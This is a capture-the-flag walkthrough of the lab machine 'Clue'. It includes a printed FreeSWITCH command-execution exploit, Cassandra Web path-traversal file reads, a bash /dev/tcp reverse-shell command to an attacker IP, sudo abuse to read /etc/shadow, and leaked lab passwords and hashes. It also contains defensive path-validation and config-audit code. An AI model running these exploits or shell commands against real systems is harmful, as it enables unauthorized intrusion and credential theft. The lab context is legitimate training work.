Clue
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.209.240
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 11:37 EST
Nmap scan report for 192.168.209.240
Host is up, received echo-reply ttl 61 (0.22s latency).
Scanned at 2025-11-09 11:37:01 EST for 102s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGGcX/x/M6J7Y0V8EeUt0FqceuxieEOe2fUH2RsY3XiSxByQWNQi+XSrFElrfjdR2sgnauIWWhWibfD+kTmSP5gkFcaoSsLtgfMP/2G8yuxPSev+9o1N18gZchJneakItNTaz1ltG1W//qJPZDHmkDneyv798f9ZdXBzidtR5/+2ArZd64bldUxx0irH0lNcf+ICuVlhOZyXGvSx/ceMCRozZrW2JQU+WLvs49gC78zZgvN+wrAZ/3s8gKPOIPobN3ObVSkZ+zngt0Xg/Zl11LLAbyWX7TupAt6lTYOvCSwNVZURyB1dDdjlMAXqT/Ncr4LbP+tvsiI1BKlqxx4I2r
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=
| 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0omUJRIaMtPNYa4CKBC+XUzVyZsJ1QwsksjpA/6Ml+
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open http syn-ack ttl 61 Thin httpd
|_http-title: Cassandra Web
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: thin
8021/tcp open freeswitch-event syn-ack ttl 61 FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>
HTTP (80):
Browsing to this returns a 403 Forbidden:

SMB (445):
List the shares and the permissions we have on them:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nxc smb 192.168.209.240 -u '' -p '' --shares
SMB 192.168.209.240 445 CLUE [*] Unix - Samba (name:CLUE) (domain:pg) (signing:False) (SMBv1:True)
SMB 192.168.209.240 445 CLUE [+] pg\:
SMB 192.168.209.240 445 CLUE [*] Enumerated shares
SMB 192.168.209.240 445 CLUE Share Permissions Remark
SMB 192.168.209.240 445 CLUE ----- ----------- ------
SMB 192.168.209.240 445 CLUE print$ Printer Drivers
SMB 192.168.209.240 445 CLUE backup READ Backup web directory shares
SMB 192.168.209.240 445 CLUE IPC$ IPC Service (Samba 4.9.5-Debian)
Let's skip this for now.
HTTP (3000):

Here we have Cassandra Web running on port 3000.
HTTP (8021):
Nmap shows FreeSWITCH running on that port, so let's search for public exploits:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit freeswitch
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We will grab one of them:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit -m windows/remote/47799.txt
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Clue/47799.txt
Try to run it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cat 47799.txt
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ mv 47799.txt exploit.py
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240
Missing arguments
Usage: freeswitch-exploit.py <target> <cmd>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 whoami
Authentication failed
Let's try it manually.
First we will grab the default password for FreeSWITCH from the script and connect to the port with nc:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nv 192.168.209.240 8021
(UNKNOWN) [192.168.209.240] 8021 (zope-ftp) open
Content-Type: auth/request
auth ClueCon
Content-Type: command/reply
Reply-Text: -ERR invalid
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Invalid credentials, so we need the correct password before we can get code execution on the target.
Exploitation:
Going back to Cassandra, I searched online for CVEs and found one:

We have a path traversal vulnerability.
Pull it with searchsploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ searchsploit -m 49362
Exploit: Cassandra Web 0.5.0 - Remote File Read
URL: https://www.exploit-db.com/exploits/49362
Path: /usr/share/exploitdb/exploits/linux/webapps/49362.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Clue/49362.py
Run it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 49362.py -h
usage: 49362.py [-h] [-p PORT] [-f] [-n NUMBER] target file
positional arguments:
target Cassandra Web Host
file eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline
options:
-h, --help show this help message and exit
-p, --port PORT Cassandra Web Port
-f, --force Run the payload even if server isn't Cassandra Web
-n, --number NUMBER Adjust the number of dot-dot-slash
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 49362.py 192.168.209.240 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:106:113::/nonexistent:/usr/sbin/nologin
cassandra:x:107:114:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
cassie:x:1000:1000::/home/cassie:/bin/bash
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bash
This time I get stuck with the path traversal vulnerability, because I do not know exactly where the files reside on that system, so let's skip this too for a moment.
Let's step back to our SMB backup share and connect to it:
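The file read above works because the web server joins the request path onto its static directory without checking that the result still lies inside it. As an added example (not Cassandra Web's own code, which is Ruby, and not from this walkthrough), here is that naive resolver beside a hardened one in Python; the directory layout and request paths are constructed:

```python
import os
import tempfile
from urllib.parse import unquote

def resolve_naive(static_root, url_path):
    """The bug class: glue the request path onto the web root and open
    whatever that names. '../' segments walk straight out of the root."""
    return os.path.normpath(os.path.join(static_root, url_path.lstrip("/")))

def resolve_safe(static_root, url_path):
    """Percent-decode, resolve to a canonical absolute path (realpath also
    follows symlinks, so a link pointing outside the root is caught too) and
    refuse anything that does not remain under the canonical web root.
    Returns the path to serve, or None when the request must be rejected."""
    root = os.path.realpath(static_root)
    decoded = unquote(url_path)            # catches ..%2f and %2e%2e forms
    if "\x00" in decoded:                  # NUL would truncate a C-level path
        return None
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

def build_fixture():
    """Constructed layout: <tmp>/www is the web root holding app.css,
    <tmp>/secret.txt sits outside it, and www/leak is a symlink to it."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "www")
    os.makedirs(root)
    css = os.path.join(root, "app.css")
    secret = os.path.join(base, "secret.txt")
    with open(css, "w") as fh:
        fh.write("body {}")
    with open(secret, "w") as fh:
        fh.write("not for the web root")
    os.symlink(secret, os.path.join(root, "leak"))
    return {"root": os.path.realpath(root),
            "css": os.path.realpath(css),
            "secret": os.path.realpath(secret)}

if __name__ == "__main__":
    fx = build_fixture()
    # Request paths constructed to mirror the traversal used against port 3000
    for req in ("/app.css", "/../secret.txt", "/..%2fsecret.txt", "/leak"):
        print(f"{req:20} naive={resolve_naive(fx['root'], req)!r:45} "
              f"safe={resolve_safe(fx['root'], req)!r}")
```

Note that curl squashes `../` segments client-side unless `--path-as-is` is given (which is why the later requests to port 1337 need that flag); a server cannot rely on clients doing that and must normalise and check the path itself.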
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ mkdir backup
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cd backup
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ smbclient -N //192.168.209.240/backup
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 5 04:43:50 2022
.. D 0 Fri Aug 5 04:43:44 2022
freeswitch D 0 Fri Aug 5 04:43:51 2022
cassandra D 0 Fri May 6 11:04:47 2022
14343176 blocks of size 1024. 10598380 blocks available
We can get the files with mget, or by mounting the share on our Kali box:
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \freeswitch\usr\bin\tone2wav of size 14512 as freeswitch/usr/bin/tone2wav (18.5 KiloBytes/sec) (average 18.5 KiloBytes/sec)
getting file \freeswitch\usr\bin\fs_ivrd of size 68320 as freeswitch/usr/bin/fs_ivrd (51.0 KiloBytes/sec) (average 39.1 KiloBytes/sec)
getting file \freeswitch\usr\bin\fs_cli of size 98624 as freeswitch/usr/bin/fs_cli (66.9 KiloBytes/sec) (average 50.5 KiloBytes/sec)
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ sudo mount -t cifs //192.168.209.240/backup backup/ -o guest
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ ls
cassandra freeswitch
From here I searched for passwords and found only ClueCon, which is the default password. So let's grep for that word, list the files it appears in, then use our path traversal to check whether the live copies on the target give a different result (we could also download the project's GitHub repo and do the same if we did not have access to the source this way):
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null
freeswitch/etc/freeswitch/ivr_menus/new_demo_ivr.xml:21: <entry action="menu-sub" digits="3" param="cluecon_ivr_submenu"/> <!-- ClueCon sub menu -->
freeswitch/etc/freeswitch/ivr_menus/new_demo_ivr.xml:54: <!-- ClueCon IVR Sub Menu -->
freeswitch/etc/freeswitch/ivr_menus/demo_ivr.xml:25: <entry action="menu-exec-app" digits="4" param="transfer 9191 XML default"/> <!-- ClueCon -->
freeswitch/etc/freeswitch/dialplan/default.xml:713: <extension name="ClueCon">
freeswitch/etc/freeswitch/dialplan/default.xml:715: <action application="set" data="effective_caller_id_name=ClueCon IVR"/>
freeswitch/etc/freeswitch/autoload_configs/event_socket.conf.xml:6: <param name="password" value="ClueCon"/>
freeswitch/etc/freeswitch/autoload_configs/erlang_event.conf.xml:12: <param name="cookie" value="ClueCon"/>
freeswitch/etc/freeswitch/autoload_configs/hash.conf.xml:4: <!-- <remote name="Test1" host="10.0.0.10" port="8021" password="ClueCon" interval="1000" /> -->
freeswitch/etc/freeswitch/autoload_configs/event_multicast.conf.xml:11: <!-- <param name="psk" value="ClueCon"/> -->
freeswitch/etc/freeswitch/lang/es/demo/demo-ivr-es-MX.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/es/demo/demo-ivr-es-ES.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/demo-ivr.xml:42: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:18: <!-- Menu option 3: To hear about ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:49: <!-- Menu option 3: To hear about ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:134: <!-- More information about ClueCon -->
freeswitch/etc/freeswitch/lang/en/demo/new-demo-ivr.xml:138: <!-- Information about ClueCon... -->
freeswitch/etc/freeswitch/lang/pt/demo/demo-ivr-pt-PT.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/pt/demo/demo-ivr-pt-BR.xml:44: <!-- Menu option 4: Register for ClueCon -->
freeswitch/etc/freeswitch/lang/he/demo/demo-ivr.xml:42: <!-- Menu option 4: Register for ClueCon -->
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null | cut -d ':' -f 1 | sed 's|.*\(\/etc/.*\)|\1|'
/etc/freeswitch/ivr_menus/new_demo_ivr.xml
/etc/freeswitch/ivr_menus/new_demo_ivr.xml
/etc/freeswitch/ivr_menus/demo_ivr.xml
/etc/freeswitch/dialplan/default.xml
/etc/freeswitch/dialplan/default.xml
/etc/freeswitch/autoload_configs/event_socket.conf.xml
/etc/freeswitch/autoload_configs/erlang_event.conf.xml
/etc/freeswitch/autoload_configs/hash.conf.xml
/etc/freeswitch/autoload_configs/event_multicast.conf.xml
/etc/freeswitch/lang/es/demo/demo-ivr-es-MX.xml
/etc/freeswitch/lang/es/demo/demo-ivr-es-ES.xml
/etc/freeswitch/lang/en/demo/demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/en/demo/new-demo-ivr.xml
/etc/freeswitch/lang/pt/demo/demo-ivr-pt-PT.xml
/etc/freeswitch/lang/pt/demo/demo-ivr-pt-BR.xml
/etc/freeswitch/lang/he/demo/demo-ivr.xml
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Clue/backup]
└─$ grep 'ClueCon' freeswitch -nR 2>/dev/null | cut -d ':' -f 1 | sed 's|.*\(\/etc/.*\)|\1|' > brute.txt
Now the second step, read each of those paths through the traversal:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ for i in $(cat brute.txt); do python3 49362.py 192.168.209.240 $i; done
<snipped>
<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>
<snipped>
Now let's test this password out again with our FreeSWITCH script:
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='StrongClueConEight021'
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
Run it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 whoami
Authenticated
Content-Type: api/response
Content-Length: 11
freeswitch
We successfully authenticated and have remote command execution as the freeswitch user.
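What made this possible is configuration rather than a software bug: the event socket is bound to every interface and its password is still a variant of the shipped default, while an authenticated client can run `api system` and get shell commands executed as the freeswitch user. As an added example (not from this walkthrough or from FreeSWITCH), a small audit of event_socket.conf.xml for those weaknesses; the first sample mirrors the file read off the target, the hardened counterpart is constructed:

```python
import xml.etree.ElementTree as ET

# Password FreeSWITCH ships with; the public exploit script tries exactly this.
DEFAULT_ESL_PASSWORD = "ClueCon"
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
MIN_PASSWORD_LEN = 16

# Constructed sample mirroring the event_socket.conf.xml read off the target.
WEAK_CONF = """\
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="StrongClueConEight021"/>
  </settings>
</configuration>
"""

# Constructed hardened counterpart: loopback only, an inbound ACL
# (apply-inbound-acl is a stock event_socket parameter) and a password
# unrelated to the default.
HARDENED_CONF = """\
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
    <param name="password" value="x7Qm2vL9pR4tW8zK0sN3"/>
  </settings>
</configuration>
"""

def esl_params(xml_text):
    """Return {name: value} for every <param> in the configuration."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value", "") for p in root.iter("param")}

def audit_event_socket(xml_text):
    """Return a list of findings; an empty list means nothing was flagged.
    The ESL password is effectively a shell credential, because an
    authenticated client can run 'api system <cmd>' as the freeswitch user."""
    p = esl_params(xml_text)
    findings = []
    pw = p.get("password", "")
    ip = p.get("listen-ip", "")
    if pw == DEFAULT_ESL_PASSWORD:
        findings.append("password is the shipped default 'ClueCon'")
    elif DEFAULT_ESL_PASSWORD.lower() in pw.lower():
        findings.append("password is a variant of the shipped default")
    if len(pw) < MIN_PASSWORD_LEN:
        findings.append(f"password shorter than {MIN_PASSWORD_LEN} characters")
    if ip not in LOOPBACK:
        findings.append(f"listen-ip {ip or '(unset)'} exposes port "
                        f"{p.get('listen-port', '8021')} beyond the host")
        if not p.get("apply-inbound-acl"):
            findings.append("no apply-inbound-acl limiting which clients may connect")
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_event_socket(conf) or ["OK"])
```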
Get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nlvp 80
listening on [any] 80 ...
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ python3 exploit.py 192.168.209.240 'bash -c "bash -i >& /dev/tcp/192.168.45.187/80 0>&1"'
Authenticated
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.209.240] 52678
bash: cannot set terminal process group (533): Inappropriate ioctl for device
bash: no job control in this shell
freeswitch@clue:/$ which python3
/usr/bin/python3
freeswitch@clue:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
freeswitch@clue:/$ export TERM=xterm
freeswitch@clue:/$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ stty -a
speed 38400 baud; rows 43; columns 171; line = 0;
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
freeswitch@clue:/$ stty rows 43 columns 171
freeswitch@clue:/$
Post Exploitation:
Lateral Movement to Cassie:
I uploaded linpeas and found this:
freeswitch@clue:/$ cd /dev/shm
freeswitch@clue:/dev/shm$ curl http://192.168.45.187/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 949k 100 949k 0 0 823k 0 0:00:01 0:00:01 --:--:-- 823k
freeswitch@clue:/dev/shm$ chmod +x linpeas.sh
freeswitch@clue:/dev/shm$ ./linpeas.sh
<snipped>
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
root 1 0.0 0.4 103860 10076 ? Ss 11:33 0:00 /sbin/init
<snipped>
cassie 981 0.0 1.6 623504 34428 ? Rsl 11:35 0:01 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330
root 1355 0.0 1.0 48052 21708 ? Ss 11:36 0:00 /usr/sbin/smbd --foreground --no-process-group
<snipped>
We can get the same result with ps aux.
freeswitch@clue:/dev/shm$ su cassie
Password: SecondBiteTheApple330
cassie@clue:/dev/shm$
Privilege Escalation to Root:
If we go back to our home directory, we find a private key for anthony, the second user on that system:
cassie@clue:/dev/shm$ cd
cassie@clue:~$ ls -la
total 36
drwxr-xr-x 5 cassie cassie 4096 Nov 9 12:31 .
drwxr-xr-x 4 root root 4096 Aug 5 2022 ..
lrwxrwxrwx 1 root root 9 Aug 5 2022 .bash_history -> /dev/null
-rw-r--r-- 1 cassie cassie 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 cassie cassie 3526 Apr 18 2019 .bashrc
drwx------ 3 cassie cassie 4096 Aug 11 2022 .gnupg
-rw------- 1 cassie cassie 1823 Aug 11 2022 id_rsa
drwxrwx--- 3 cassie cassie 4096 Nov 9 12:31 .local
-rw-r--r-- 1 cassie cassie 807 Apr 18 2019 .profile
drwx------ 2 cassie cassie 4096 Aug 11 2022 .ssh
cassie@clue:~$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
<snipped>
-----END OPENSSH PRIVATE KEY-----
cassie@clue:~$ cat id_rsa | grep -v '\-\-' | base64 -d | xxd
00000000: 6f70 656e 7373 682d 6b65 792d 7631 0000 openssh-key-v1..
00000010: 0000 046e 6f6e 6500 0000 046e 6f6e 6500 ...none....none.
00000020: 0000 0000 0000 0100 0001 1700 0000 0773 ...............s
<snipped>
000004f0: 9bf5 69e4 2759 2500 0000 0c61 6e74 686f ..i.'Y%....antho
00000500: 6e79 4063 6c75 6501 0203 0405 0607 ny@clue.......
cassie@clue:~$ ls -la ../anthony/
total 28
drwxr-xr-x 3 anthony anthony 4096 Aug 5 2022 .
drwxr-xr-x 4 root root 4096 Aug 5 2022 ..
-rw------- 1 anthony anthony 120 Aug 5 2022 .bash_history
-rw-r--r-- 1 anthony anthony 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 anthony anthony 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 anthony anthony 807 Apr 18 2019 .profile
drwx------ 2 anthony anthony 4096 Aug 5 2022 .ssh
I copied it to my local Kali and tried to authenticate as anthony, but could not.
From the output above, we can see a .bash_history file that has some content, but only anthony and root can read it.
cassie@clue:~$ sudo -l
Matching Defaults entries for cassie on clue:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cassie may run the following commands on clue:
(ALL) NOPASSWD: /usr/local/bin/cassandra-web
cassie@clue:~$ sudo /usr/local/bin/cassandra-web
I, [2025-11-09T12:39:07.010211 #25228] INFO -- : Establishing control connection
W, [2025-11-09T12:39:07.012976 #25228] WARN -- : Host 127.0.0.1 refused all connections
Cassandra::Errors::AuthenticationError: Server requested authentication, but client was not configured to authenticate
Usage: cassandra-web [options]
-B, --bind BIND ip:port or path for cassandra web to bind on (default: 0.0.0.0:3000)
-H, --hosts HOSTS coma-separated list of cassandra hosts (default: 127.0.0.1)
-P, --port PORT integer port that cassandra is running on (default: 9042)
-L, --log-level LEVEL log level (default: info)
-u, --username USER username to use when connecting to cassandra
-p, --password PASS password to use when connecting to cassandra
-C, --compression NAME compression algorithm to use (lz4 or snappy)
--server-cert PATH server ceritificate pathname
--client-cert PATH client ceritificate pathname
--private-key PATH path to private key
--passphrase SECRET passphrase for the private key
-h, --help Show help
We can run another Cassandra Web instance on a different port, but this time with sudo privileges, so if we exploit the same path traversal we used against port 3000 on our newly created port, the file read happens as root and we can view, for example, root's files or that .bash_history file.
cassie@clue:~$ sudo cassandra-web -u cassie -p SecondBiteTheApple330 -B 1337
I, [2025-11-09T12:56:13.239712 #16117] INFO -- : Establishing control connection
I, [2025-11-09T12:56:13.322105 #16117] INFO -- : Refreshing connected host's metadata
I, [2025-11-09T12:56:13.325311 #16117] INFO -- : Completed refreshing connected host's metadata
I, [2025-11-09T12:56:13.325918 #16117] INFO -- : Refreshing peers metadata
I, [2025-11-09T12:56:13.326946 #16117] INFO -- : Completed refreshing peers metadata
I, [2025-11-09T12:56:13.327004 #16117] INFO -- : Refreshing schema
I, [2025-11-09T12:56:13.352410 #16117] INFO -- : Schema refreshed
I, [2025-11-09T12:56:13.352466 #16117] INFO -- : Control connection established
I, [2025-11-09T12:56:13.352763 #16117] INFO -- : Creating session
I, [2025-11-09T12:56:13.445638 #16117] INFO -- : Session created
2025-11-09 12:56:13 -0500 Thin web server (v1.8.1 codename Infinite Smoothie)
2025-11-09 12:56:13 -0500 Maximum connections set to 1024
2025-11-09 12:56:13 -0500 Listening on 0.0.0.0:1337, CTRL+C to stop
From another reverse shell, let's try to view some of the protected files:
cassie@clue:~$ curl localhost:1337/../../../../../../../../../etc/shadow --path-as-is
root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
daemon:*:18555:0:99999:7:::
bin:*:18555:0:99999:7:::
sys:*:18555:0:99999:7:::
sync:*:18555:0:99999:7:::
games:*:18555:0:99999:7:::
man:*:18555:0:99999:7:::
lp:*:18555:0:99999:7:::
mail:*:18555:0:99999:7:::
news:*:18555:0:99999:7:::
uucp:*:18555:0:99999:7:::
proxy:*:18555:0:99999:7:::
